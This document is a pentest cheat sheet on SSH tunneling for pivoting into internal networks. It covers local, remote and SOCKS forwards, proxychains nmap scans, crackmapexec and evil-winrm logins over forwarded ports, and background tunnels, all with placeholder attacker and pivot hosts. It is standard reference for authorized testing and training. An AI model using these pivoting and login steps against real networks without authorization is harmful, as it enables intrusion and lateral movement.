SSH TUNNELING

Local port forward

Access internal:80 via your localhost:8080 — Browse internal web apps

ssh -L 8080:INTERNAL_TARGET:80 user@PIVOT_HOST
Example Output
ssh -L 8080:172.16.1.10:80 john@10.10.14.5

Now browse: http://127.0.0.1:8080
(You see internal web app on 172.16.1.10:80)

Remote port forward

Make your port accessible from pivot — Expose your tools to internal net

ssh -R 9090:127.0.0.1:80 user@ATTACKER_IP
Example Output
ssh -R 9090:127.0.0.1:80 attacker@10.10.14.2

On attacker: curl http://127.0.0.1:9090
(Access pivot's localhost:80 from your machine)

Dynamic SOCKS proxy

SOCKS proxy through pivot — Route any tool through pivot

ssh -D 1080 user@PIVOT_HOST
Example Output
ssh -D 1080 john@10.10.14.5

Edit /etc/proxychains4.conf:
socks5 127.0.0.1 1080

proxychains nmap -sT -Pn 172.16.1.10
(Scan internal network through pivot)

Use SOCKS proxy

Prepend proxychains to any command — Edit /etc/proxychains4.conf: socks5 127.0.0.1 1080

proxychains nmap -sT -Pn INTERNAL_TARGET
proxychains crackmapexec smb INTERNAL_TARGET
Example Output
proxychains nmap -sT -Pn 172.16.1.10
ProxyChains | S-chain |->127.0.0.1:1080

PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
445/tcp open  microsoft-ds
(Scanning internal network through pivot)

SSH with key + tunnel

Multiple port forwards at once — Forward several services

ssh -i id_rsa -L 445:DC_IP:445 -L 5985:DC_IP:5985 user@PIVOT
Example Output
ssh -i id_rsa -L 445:172.16.1.10:445 -L 5985:172.16.1.10:5985 john@10.10.10.5

Now on attacker:
crackmapexec smb 127.0.0.1 -u admin -p Pass
evil-winrm -i 127.0.0.1 -u admin -p Pass
(Multiple internal ports forwarded at once)

Persistent SSH tunnel

Background tunnel — -f background, -N no commands, -T no TTY

ssh -fNT -L 8080:INTERNAL:80 user@PIVOT
Example Output
ssh -fNT -L 8080:172.16.1.10:80 john@10.10.10.5

(Returns to prompt, tunnel runs in background)
curl http://127.0.0.1:8080
(Access internal web app while working)